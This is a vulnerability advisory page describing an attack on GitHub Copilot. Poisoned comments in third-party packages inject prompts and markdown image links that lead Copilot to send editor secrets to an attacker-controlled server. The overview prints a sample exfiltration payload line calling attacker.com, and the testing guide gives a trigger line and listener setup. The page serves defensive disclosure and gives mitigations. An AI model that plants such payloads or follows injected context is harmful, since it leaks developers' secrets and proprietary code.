HIGH Patch Available

GitHub Copilot Exfiltration via Manipulated Autocomplete Context from Third-Party Dependencies

Discovered 3 November 2025 29 views

Overview

Security researchers demonstrated a sophisticated data exfiltration technique targeting users of GitHub Copilot in IDEs like VS Code. The attack vector relies on poisoning the context window that Copilot uses to generate code suggestions. An attacker first publishes a seemingly benign and useful library to a public package manager (e.g., npm, PyPI). This library contains code with specially crafted, large comment blocks or string literals. These strings contain hidden prompts and markdown-style image embeds pointing to an attacker-controlled server (e.g., `/* ... [!]![](http://attacker.com/log?data=<PAYLOAD>) ... */`). When a developer imports and uses this library, their IDE's Copilot plugin sends the surrounding code, including the malicious comment block, as context to the Copilot service. The service's backend, which processes this context, is tricked into rendering the markdown image tag. This action triggers an HTTP GET request to the attacker's server. The researchers found that they could craft the context in such a way that the `<PAYLOAD>` portion of the URL would be populated by Copilot with code from the developer's active editor window, including secrets, API keys, or proprietary business logic. This effectively turns Copilot into a data exfiltration tool, leaking sensitive information from private repositories without any direct user interaction beyond normal coding.

Affected Systems

GitHub Copilot VS Code Extension < 1.195.0GitHub Copilot CLI < 0.8.0

Testing Guide

1. Create a dummy code file containing a sensitive string, e.g., `API_KEY = "123-secret-abc"`. 2. In the same file, add a comment block copied from a known PoC for this vulnerability, e.g., `// PoC trigger: [![](http://your-test-server.com/?d=)]`. 3. Set up a listener on `your-test-server.com` to log incoming HTTP requests. 4. Activate Copilot and begin typing near the comment block. Monitor the server logs to see if Copilot makes a request containing parts of your sensitive string.

Mitigation Steps

1. Update the GitHub Copilot extension for your IDE to the latest version. The patch sanitizes context data sent to the backend and implements stricter egress filtering. 2. Vet all third-party dependencies. Use code scanning tools to look for suspicious or heavily obfuscated string literals and comments. 3. Configure network firewalls to block egress traffic from developer machines and CI/CD runners to unknown or untrusted domains. 4. Use Copilot's content exclusion settings to prevent it from accessing sensitive files or repositories.

Patch Details

Patched in GitHub Copilot VS Code Extension v1.195.0. The patch introduced context sanitization and stricter backend network policies.

Sources

← Back to vulnerabilities